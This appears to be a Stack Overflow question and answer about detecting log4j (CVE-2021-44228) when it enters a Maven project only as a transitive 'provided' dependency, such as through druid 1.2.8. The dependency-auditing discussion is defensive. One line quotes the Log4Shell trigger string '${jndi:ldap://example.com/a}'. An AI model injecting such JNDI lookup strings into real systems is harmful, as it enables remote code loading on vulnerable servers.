# How could we resolve the transitive provided dependencies in Maven?

Tags: maven, scope, dependencies, log4j

On Dec 10, a severe vulnerability was found in `log4j2`(CVE-2021-44228), I was asked to detect all the `log4j` usages (both direct and transitive) in our projects(mostly maven projects). I found it is easy to detect if `log4j2` was listed as direct dependencies. I can inspect them through `mvn dependency:tree` or `mvn dependency:build-classpath`. Like the tree shown below. I know this is also the method Eclipse Steady and OWASP are using.

> my-company:my-app:v1.0 
> \- org.apache.logging.log4j:log4j-api:jar:2.13.3:compile

However, in some special cases, things are not that easy. For example, I have another project like this:

> my-company:my-app2:v1.0 
> \- com.alibaba:druid:jar:1.2.8:compile

This looks pretty clean, right? But actually, `log4j2` is listed as a "provided" dependency in `druid 1.2.8`. Check pom [here](https://repo1.maven.org/maven2/com/alibaba/druid/1.2.8/druid-1.2.8.pom). According to maven document, "provided" scope is not transitive, thus `log4j` is not listed in the tree.

But actually, it is there. I can find the function call of log4j inside this `druid:1.2.8`.

check here: [log4j2 in druid](https://i.stack.imgur.com/hsks0.png)

I also use `soot` to make sure this function is actually reachable.

According to this [page](https://blog.cloudflare.com/inside-the-log4j2-vulnerability-cve-2021-44228/), any string like `${jndi:ldap://example.com/a}` can cause such a problem. So theoretically, `druid:1.2.8` is infected.

the Actuall tree maybe like this

> my-company:my-app2:v1.0 
> \- com.alibaba:druid:jar:1.2.8:compile 
>     \-org.apache.logging.log4j:log4j-core:jar:2.13.3:provided

**Lets define the relationship between `log4j` and `my-app2` as *transitive "provided" dependency***

Here is my question:

1. Why doesn't maven list the transitive provided dependencies in the tree? Just for a better understanding of the dependency relationship.
2. Without checking poms one by one manually, how could we resolve the *transitive provided dependency*?

Comment: Hi I have the same issue, the dependency has log4j as provided scope, were you able to resolver it? Thank you

Answer (score 4, accepted):

Class and method resolution in java happens during runtime, the first time the class or method is referenced. If the code you linked is run without `Logger` or `LogManager` on the classpath this would result in an error being thrown. If it is not actually used, for example if it has to be manually configured somehow, then this is totally fine.

Note also that both `Logger` and `LogManager` are part of the log4j-api dependency, while the code affected by the vulnerability is in log4j-core. A dependency on log4j-api should be totally fine and there are projects like log4j-to-slf4j that implement this api and delegate actual logging to a different implementation.

Comment: Hi, but according to the maven scope document, "provided" dependency only participate in compilation, not in runtime, so could this `Logger` or `LogManager` be resolved during the compile, instead of first runtime?

Comment: Also, my main concern is that log4j participate in the compilation, and part of its code is compiled into "druid". Maybe in this case, `Logger` and `LogManager` is not vulnerable, but with careful edit, could any vulnerable code be included? If so, how are we going to know it since maven didn't list all the transitive "provided" dependencies.

Comment: Hi I have the same issue, the dependency has log4j as provided scope, were you able to resolver it? Thank you

Comment: @DiegoRamos I think I finally figured it out. If a dep is in provided scope, such dep will not be released with the JAR, however, users must provide the dep in the classpath when running. So it is unnecessary to resolve provided deps transitively. Instead, looking for deps in the top-level project's classpath is enough. The version of the top-level dep will override all other eponymous deps.